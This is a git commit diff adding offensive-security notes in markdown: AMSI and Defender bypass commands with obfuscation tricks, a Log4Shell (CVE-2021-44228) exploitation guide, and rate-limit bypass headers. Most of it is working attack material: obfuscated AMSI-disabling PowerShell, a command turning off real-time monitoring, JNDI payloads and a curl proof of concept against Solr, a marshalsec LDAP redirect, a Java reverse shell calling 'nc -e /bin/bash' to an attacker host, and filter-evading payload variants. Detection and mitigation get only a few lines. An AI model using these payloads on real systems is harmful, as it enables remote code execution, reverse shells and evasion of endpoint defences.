log4j
This commit is contained in:
parent
edb74c88ef
commit
fe64f65d51
|
|
@ -26,17 +26,71 @@ AMSI_RESULT_DETECTED = 32768
|
|||
* [Matt Graeber's Reflection](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/)
|
||||
* PowerShell downgrade
|
||||
* [S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git)
|
||||
|
||||
* [BC-Security's AMSI bypass](https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py)
|
||||
* [RastaMouse's AMSI bypass](https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs)
|
||||
* Practical example
|
||||
```sh
|
||||
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
|
||||
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
|
||||
Set-MpPreference -DisableRealtimeMonitoring $true
|
||||
```
|
||||
* Varying string concatenation and camelCasing variations of the following string
|
||||
```sh
|
||||
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
|
||||
```
|
||||
|
||||
### Validate
|
||||
* Validate Obfuscation
|
||||
* Validate Obfuscation and check which strings trigger AMSI
|
||||
* [AMSITrigger Repo](https://github.com/RythmStick/AMSITrigger)
|
||||
```sh
|
||||
.\\AMSITrigger.exe -u <URL> -f 1
|
||||
```
|
||||
or
|
||||
```sh
|
||||
.\\AMSITrigger.exe -i <file> -f 1
|
||||
```
|
||||
|
||||
### Further Obfuscation
|
||||
|
||||
* String concatenation
|
||||
```sh
|
||||
$OBF = 'Ob' + 'fu' + 's' +'cation'
|
||||
```
|
||||
* `Concatenate - ('co'+'ffe'+'e')`
|
||||
* `Reorder - ('{1}{0}'-f'ffee','co')`
|
||||
* `Whitespace - ( 'co' +'fee' + 'e')`
|
||||
|
||||
#### Type Obfuscation
|
||||
* .NET has type accelerators as aliases for types to shorten them and break the signature.
|
||||
* [idera](https://community.idera.com/database-tools/powershell/powertips/b/tips/posts/adding-new-type-accelerators-in-powershell)
|
||||
* [0x00-0x00](https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html)
|
||||
* [Documentation at microsoft](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_type_accelerators?view=powershell-7.1)
|
||||
|
||||
* Example
|
||||
* Without
|
||||
```sh
|
||||
[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);
|
||||
```
|
||||
* With
|
||||
```sh
|
||||
[dorkstork]::copy($buf, 0, $BufferAddress, 6);
|
||||
```
|
||||
|
||||
### Automated Obfuscation
|
||||
|
||||
#### Powershell
|
||||
* [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation)
|
||||
* [Daniel's guide to Invoke-Obfuscation](https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide)
|
||||
```sh
|
||||
Invoke-Obfuscation -ScriptBlock {'Payload Here'} -Command 'Token\\String\\1,2,\\Whitespace\\1' -Quiet -NoExit
|
||||
```
|
||||
* [__8191 character limit__](https://docs.microsoft.com/en-us/troubleshoot/windows-client/shell-experience/command-line-string-limitation) of command prompt must not be exceeded.
|
||||
|
||||
#### Other Obfuscation
|
||||
* Pinpoint bytes that will be flagged with [ThreadCheck](https://github.com/rasta-mouse/ThreatCheck)
|
||||
* Has to be build via VS. Will output a ddll, an excutable and an XML file.
|
||||
* `ThreatCheck.exe -f <file>`
|
||||
* [DefenderCheck](https://github.com/matterpreter/DefenderCheck)
|
||||
|
||||
## Links
|
||||
* [cmnatic](https://cmnatic.co.uk/)
|
||||
|
|
|
|||
|
|
@ -0,0 +1,85 @@
|
|||
# Log4Shell
|
||||
|
||||
* `log4j` < version 2.15.0rc2
|
||||
* [CVE-2021-44228](https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java)
|
||||
* [log4j vulnerability tester](https://log4shell.huntress.com/)
|
||||
* [List of exploitable services](https://github.com/YfryTchsGD/Log4jAttackSurface)
|
||||
|
||||
* Code inside a `param` value is parsed and a `${payload}` will be executed, for example
|
||||
```sh
|
||||
${sys:os.name}
|
||||
${sys:user.name}
|
||||
${log4j:configParentLocation}
|
||||
${ENV:PATH}
|
||||
${ENV:HOSTNAME}
|
||||
${java:version}
|
||||
```
|
||||
## Java Naming and Directory Interface JNDI
|
||||
|
||||
* Vulnerability can be exploited via `${jndi:ldap://<attacker-IP>/foo}`
|
||||
|
||||
## POC
|
||||
```sh
|
||||
curl 'http://<target-IP>:8983/solr/admin/cores?foo=?$\{jndi:ldap://<attacker-IP>:4449\}'
|
||||
```
|
||||
|
||||
## Usage
|
||||
|
||||
* Fuzz endpoints to applicate the exploit
|
||||
* Use HTTP header field as storage for payload as well as any other possible input field
|
||||
```HTTP
|
||||
X-Forwarded-For: ${jndi:ldap://<attacker-IP>:1389/foo}
|
||||
```
|
||||
|
||||
* Clone and build [marshallsec](https://github.com/mbechler/marshalsec) via `mvn clean package -DskipTests`
|
||||
* Java version should be the same as the one on the target
|
||||
* Redirect LDAP server to HTTP server
|
||||
```sh
|
||||
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
|
||||
```
|
||||
|
||||
* Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class
|
||||
```sh
|
||||
public class Exploit {
|
||||
static {
|
||||
try {
|
||||
java.lang.Runtime.getRuntime().exec("nc -e /bin/bash $ATTACKER_IP 4449");
|
||||
} catch (Exception e) {
|
||||
e.printStackTrace();
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
* Open reverse shell on `4449`
|
||||
* `curl 'http://.10.43.243:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'`
|
||||
|
||||
|
||||
## Detection
|
||||
|
||||
* [Log4Shell-Hashes](https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes.git)
|
||||
* [Vulnerable Class + Jar hashes](https://github.com/nccgroup/Cyber-Defence/tree/master/Intelligence/CVE-2021-44228)
|
||||
* [reddit mega thread](https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/)
|
||||
* [Yara rules](https://github.com/darkarnium/CVE-2021-44228)
|
||||
|
||||
* Parse logs for `jndi`
|
||||
|
||||
## Bypasses
|
||||
|
||||
* Possible bypasses are as follows
|
||||
```sh
|
||||
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
|
||||
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}
|
||||
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/}
|
||||
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z}
|
||||
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/}
|
||||
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/}
|
||||
${${::-j}ndi:rmi://attackerendpoint.com/}
|
||||
```
|
||||
|
||||
## Mitgation
|
||||
|
||||
* [Apache Solr security news](https://solr.apache.org/security.html)
|
||||
* Add the following line to `solr.in.sh`
|
||||
```toml
|
||||
SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"
|
||||
```
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
# Bypassing Rate Limit
|
||||
|
||||
* [Infosecwriteups article](https://infosecwriteups.com/bypassing-rate-limit-like-a-pro-5f3e40250d3c)
|
||||
* [Anotherinfosecwriteups article](https://infosecwriteups.com/no-rate-limit-use-like-a-pro-33fc76744a17)
|
||||
* [Hacktricks' site](https://book.hacktricks.xyz/pentesting-web/rate-limit-bypass)
|
||||
|
||||
# Usage
|
||||
|
||||
* Add one of the following lines to the header in round robin
|
||||
```sh
|
||||
X-Originating-IP: 127.0.0.1
|
||||
X-Forwarded-For: 127.0.0.1
|
||||
X-Remote-IP: 127.0.0.1
|
||||
X-Remote-Addr: 127.0.0.1
|
||||
X-Client-IP: 127.0.0.1
|
||||
X-Host: 127.0.0.1
|
||||
X-Forwared-Host: 127.0.0.1
|
||||
```
|
||||
Loading…
Reference in New Issue